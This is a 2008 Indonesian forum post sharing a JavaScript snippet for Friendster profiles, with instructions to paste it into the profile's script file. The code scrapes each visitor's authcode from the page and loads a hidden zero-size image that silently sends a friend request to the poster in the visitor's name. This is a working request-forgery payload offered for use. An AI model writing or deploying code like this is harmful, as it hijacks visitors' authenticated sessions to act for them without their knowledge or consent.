script ini di buat oleh MR paul
script supaya orang yg buka profile kita langsung secara automatis add as friends
langsung aja ini scriptnya:
[spoiler]//automatis add ad friends By MR. PAUL DEMONTEVERDE
FRIENDSTER AUTOMATIC ADD AS FRIEND
THIS NOTE MUST STAY INTACT WITH THIS CODE!
CONSTRUCTED AND CODED BY MR. PAUL DEMONTEVERDE
YOU CAN USE FREELY ALL TEMPLATES, GRAPHICS AND CODES
BY AGREEING NOT TO REMOVE THIS COMMENT
PHILIPPINE COPYRIGHT 2008, PAULDEMONTEVERDE
anda secara automatis add ad friends gue (boleh di edit)
BUGS FIXED:
No worries about onload function
just add the codes on your existing javascript file
------------------------------------------------------*/
var email_add = "adrizz_ndezo@yahoo.co.id";
var get_authcode = document.getElementById("controlPanelButtons").innerHTML;
var add_it = get_authcode.slice(get_authcode.indexOf("authcode="));
var PlaceInput = add_it.slice(9,39);
document.write('<img src="http://www.friendster.com/addfriendrequest.php?authcode='
+ PlaceInput + '&uid='
+ pageOwnerID + '&email='
+ email_add + '&firstname=&lastname=&friend=&submit=1"'
+ ' width="0" height="0" style="display:none" />');[/spoiler]
selipkan ke dalam file js kalian di bagian B sesuai tutorial bang kanal
langsung kabur ah cmn sekilas info
kabur,,,,,,,,,,,,,,,,,,,,
ipang
masuk aja di sini
[url]http://theftalk.com/f53-Tricks%2C-Tutorials%2C-Add-ons.html[/url]
Last edited by adrizz_ndezo (2008-11-10 12:33:41)